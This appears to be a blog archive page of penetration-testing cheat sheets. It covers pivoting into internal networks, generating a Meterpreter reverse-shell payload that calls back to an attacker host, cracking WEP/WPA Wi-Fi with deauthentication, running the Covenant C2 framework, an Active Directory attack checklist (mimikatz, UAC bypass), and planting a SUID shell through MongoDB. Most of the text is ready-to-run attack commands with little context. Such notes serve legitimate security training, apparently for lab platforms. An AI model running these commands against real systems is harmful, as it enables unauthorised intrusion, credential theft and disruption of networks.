Skip to main content

Posts

Showing posts from October, 2020

Pivoting into an internal network behind firewall

    Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #to revert the changes; 192.168.206.2 route delete 0.0.0.0 route add 0.0.0.0 mask 0.0.0.0 VMWare_Gateway Get a Meterpreter on the Target and add a route to attacker machine msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.14.14.3 LPORT=4444 -f elf -o rev msfconsole use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 10.14.14.3 set LPORT 4444 run background sessions -i use post/multi/manage/autoroute set SUBNET 192.168.125.0 set SESSION 4 run use auxiliary/server/socks_proxy set SRVPORT 1060 run Getting a

Wireless Pentesting

    Change Your MAC Address macchanger -m aa:bb:cc:11:22:33:44 wlan or ifconfig eth0 hw ether aa:bb:cc:11:22:33:44 ifconfig eth0 up Cracking WEP #Start Monitor Mode airmon-ng start wlan0 #Search for Wireless Networks and copy the BSSID airodump-ng wlan0mon #Start capturing IV Packets and do not close it airodump-ng --bssid 00:11:22:33:44:55:66 -c 1 wlan0mon -w PacketCapture #Crack the password aircrack-ng PacketCapture.cap Cracking WPA/WPA2 PSK WPA/WPA2 PSK works on pre authentication key, so we need to capture the handshake when the authentication happens. service network-manager stop #Start Monitor Mode airmon-ng start wlan0 #Search for Wireless Networks and copy the BSSID airodump-ng wlan0mon #Start capturing IV Packets and do not close it airodump-ng --bssid 00:11:22:33:44:55:66 -c 1 wlan0mon -w wpadump #De-authenticate the already connected user or wait for some one to reconnect to the network aireplay-ng --deauth 50 -a router_MAC_Address -h Victim_MAC_Station wlan0mon #make su

Covenant C2

    Installing Covenant C2 git clone --recurse-submodules https://github.com/cobbr/Covenant.git wget -q https://packages.microsoft.com/config/ubuntu/19.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb sudo dpkg -i packages-microsoft-prod.debsudo apt-get updatesudo apt-get install apt-transport-httpssudo apt-get updatesudo apt-get install dotnet-sdk-3.1 cd Covenant/Covenant dotnet build Start Covenant C2 cd Covenant/Covenant sudo dotnet run browse to https://127.0.0.1:7443/ Create a listener first Create a launcher - select the type of launcher Select the parameters Move to the hosts tab to give a name to your reverse shell and copy the command   After you get a shell, a Grunt will appear in your Grunts section Open the grunt and go to interact tab to interact with the target Commands : Runs Privilege escallation commands to find vulnerabilities - SharpUp audit use ShellCmd to run cmd commands Ex: ShellCmd dir c:\users\ Upload a Powershell script PowerShellImport   To run

AD PenTest - Recon and Initial Access

Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackmapexec - cheatsheet  

Mongo DB Commands

   Here are some basic mongo db commands #List Databases show dbs #Select DB use database_name #List Collections (rows & Columns in sql) show collections #list the items in a collection db.collection_name.find(); db.users.find(); db.users.find().forEach(printjson) Exploiting MongoDB - HTB Node find creds in app.js example: mongodb://usernameLpassword@localhost:port/.......=DEFAULT&authSource=databasename'; mongo -p -u username DBName //Creating SUID db.TableName.insert({"cmd" : "cp /bin/dash /tmp/filename; chmod 6755 /bin/dash;chmod u+s /tmp/filename"}) db.TableName.find() //run with privs /tmp/filename -p